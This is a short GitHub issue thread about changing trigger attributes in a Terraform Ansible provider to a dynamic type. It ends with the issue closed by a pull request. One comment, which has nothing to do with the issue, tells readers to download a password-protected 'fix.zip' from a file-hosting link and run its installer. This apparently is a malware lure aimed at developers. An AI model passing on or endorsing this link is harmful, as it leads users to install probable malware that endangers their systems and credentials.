### ISSUE TITLE
Update trigger and replacement trigger attributes to use dynamic type

### ISSUE THREAD

**Issue by marshallford** [marshallford/terraform-provider-ansible#63]
https://developer.hashicorp.com/terraform/plugin/framework/handling-data/types/dynamic

Example: https://github.com/hashicorp/terraform/blob/fab3673f8d4aa8d076927baa9341ff2b55e1862d/internal/builtin/providers/terraform/resource_data.go#L24

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marshallford** [comment]
Closed by #64
